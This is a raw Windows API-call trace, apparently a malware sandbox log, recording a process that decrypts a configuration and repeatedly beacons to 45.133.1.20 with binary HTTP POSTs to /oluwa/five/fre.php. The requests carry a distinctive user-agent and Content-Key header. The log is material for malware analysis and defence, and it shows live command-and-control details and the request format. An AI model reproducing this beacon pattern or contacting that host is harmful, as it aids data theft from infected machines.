param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0166.426] GetProcessHeap () returned 0x6a0000 [0166.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0166.426] GetProcessHeap () returned 0x6a0000 [0166.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.426] send (s=0x304, buf=0x6bbd20*, len=242, flags=0) returned 242 [0166.427] send (s=0x304, buf=0x6bb998*, len=159, flags=0) returned 159 [0166.427] GetProcessHeap () returned 0x6a0000 [0166.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0166.427] recv (in: s=0x304, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0166.494] GetProcessHeap () returned 0x6a0000 [0166.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0166.495] GetProcessHeap () returned 0x6a0000 [0166.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0166.495] GetProcessHeap () returned 0x6a0000 [0166.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0166.496] GetProcessHeap () returned 0x6a0000 [0166.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0166.496] closesocket (s=0x304) returned 0 [0166.498] GetProcessHeap () returned 0x6a0000 [0166.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0166.498] GetProcessHeap () returned 0x6a0000 [0166.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0166.498] GetProcessHeap () returned 0x6a0000 [0166.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0166.499] GetProcessHeap () returned 0x6a0000 [0166.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0166.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1320) returned 0x304 [0166.513] Sleep (dwMilliseconds=0xea60) [0166.515] GetProcessHeap () returned 0x6a0000 [0166.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0166.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.516] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.540] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0166.550] GetProcessHeap () returned 0x6a0000 [0166.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9938 [0166.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.551] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b9938, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0166.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.553] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.604] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.604] GetProcessHeap () returned 0x6a0000 [0166.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9938 | out: hHeap=0x6a0000) returned 1 [0166.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.606] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0166.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.608] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0166.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.609] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0166.609] GetProcessHeap () returned 0x6a0000 [0166.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0166.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.613] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0166.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.614] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0166.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.616] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0166.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.617] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0166.617] GetProcessHeap () returned 0x6a0000 [0166.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0166.617] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0166.618] GetProcessHeap () returned 0x6a0000 [0166.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0166.618] GetProcessHeap () returned 0x6a0000 [0166.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0166.618] GetProcessHeap () returned 0x6a0000 [0166.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0166.619] GetProcessHeap () returned 0x6a0000 [0166.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0166.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0166.660] GetProcessHeap () returned 0x6a0000 [0166.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0166.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.662] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0166.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.663] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.664] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.664] GetProcessHeap () returned 0x6a0000 [0166.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0166.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.670] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0166.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.671] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0166.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.673] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0166.673] GetProcessHeap () returned 0x6a0000 [0166.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0166.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.674] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0166.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.675] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0166.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.676] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0166.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.678] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0166.678] GetProcessHeap () returned 0x6a0000 [0166.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0166.678] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0166.678] GetProcessHeap () returned 0x6a0000 [0166.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0166.678] socket (af=2, type=1, protocol=6) returned 0x308 [0166.679] connect (s=0x308, name=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0166.709] FreeAddrInfoW (pAddrInfo=0x6b9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be898*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0166.709] GetProcessHeap () returned 0x6a0000 [0166.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0166.709] GetProcessHeap () returned 0x6a0000 [0166.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0166.712] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.714] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0166.714] GetProcessHeap () returned 0x6a0000 [0166.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0166.715] GetProcessHeap () returned 0x6a0000 [0166.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.715] GetProcessHeap () returned 0x6a0000 [0166.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0166.715] GetProcessHeap () returned 0x6a0000 [0166.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0166.716] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.717] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0166.717] GetProcessHeap () returned 0x6a0000 [0166.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0166.717] GetProcessHeap () returned 0x6a0000 [0166.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.717] send (s=0x308, buf=0x6bbd20*, len=242, flags=0) returned 242 [0166.718] send (s=0x308, buf=0x6bb998*, len=159, flags=0) returned 159 [0166.718] GetProcessHeap () returned 0x6a0000 [0166.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0166.718] recv (in: s=0x308, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0166.786] GetProcessHeap () returned 0x6a0000 [0166.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0166.791] GetProcessHeap () returned 0x6a0000 [0166.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0166.792] GetProcessHeap () returned 0x6a0000 [0166.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0166.792] GetProcessHeap () returned 0x6a0000 [0166.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0166.792] closesocket (s=0x308) returned 0 [0166.793] GetProcessHeap () returned 0x6a0000 [0166.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0166.793] GetProcessHeap () returned 0x6a0000 [0166.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0166.793] GetProcessHeap () returned 0x6a0000 [0166.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0166.794] GetProcessHeap () returned 0x6a0000 [0166.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0166.794] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12d8) returned 0x308 [0166.796] Sleep (dwMilliseconds=0xea60) [0166.797] GetProcessHeap () returned 0x6a0000 [0166.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0166.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.799] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.805] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0166.814] GetProcessHeap () returned 0x6a0000 [0166.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0166.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.817] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0166.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.818] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.822] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.823] GetProcessHeap () returned 0x6a0000 [0166.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0166.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.824] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0166.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.825] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0166.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.827] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0166.827] GetProcessHeap () returned 0x6a0000 [0166.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0166.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.828] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0166.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.829] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0166.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.840] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0166.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.841] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0166.841] GetProcessHeap () returned 0x6a0000 [0166.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0166.841] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0166.841] GetProcessHeap () returned 0x6a0000 [0166.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0166.842] GetProcessHeap () returned 0x6a0000 [0166.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0166.842] GetProcessHeap () returned 0x6a0000 [0166.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0166.842] GetProcessHeap () returned 0x6a0000 [0166.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0166.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.843] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.850] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0166.862] GetProcessHeap () returned 0x6a0000 [0166.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0166.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.864] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0166.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.868] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.869] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.869] GetProcessHeap () returned 0x6a0000 [0166.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0166.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.871] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0166.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.872] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0166.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0166.873] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0166.873] GetProcessHeap () returned 0x6a0000 [0166.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0166.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.874] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0166.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.875] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0166.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.876] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0166.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.877] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0166.877] GetProcessHeap () returned 0x6a0000 [0166.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0166.877] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9fc8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0166.877] GetProcessHeap () returned 0x6a0000 [0166.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0166.877] socket (af=2, type=1, protocol=6) returned 0x30c [0166.877] connect (s=0x30c, name=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0166.955] FreeAddrInfoW (pAddrInfo=0x6b9fc8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0166.955] GetProcessHeap () returned 0x6a0000 [0166.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0166.955] GetProcessHeap () returned 0x6a0000 [0166.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0166.956] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.957] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0166.957] GetProcessHeap () returned 0x6a0000 [0166.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0166.957] GetProcessHeap () returned 0x6a0000 [0166.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.958] GetProcessHeap () returned 0x6a0000 [0166.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0166.958] GetProcessHeap () returned 0x6a0000 [0166.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0166.959] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.959] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0166.959] GetProcessHeap () returned 0x6a0000 [0166.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0166.959] GetProcessHeap () returned 0x6a0000 [0166.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0166.960] send (s=0x30c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0166.960] send (s=0x30c, buf=0x6bb998*, len=159, flags=0) returned 159 [0166.961] 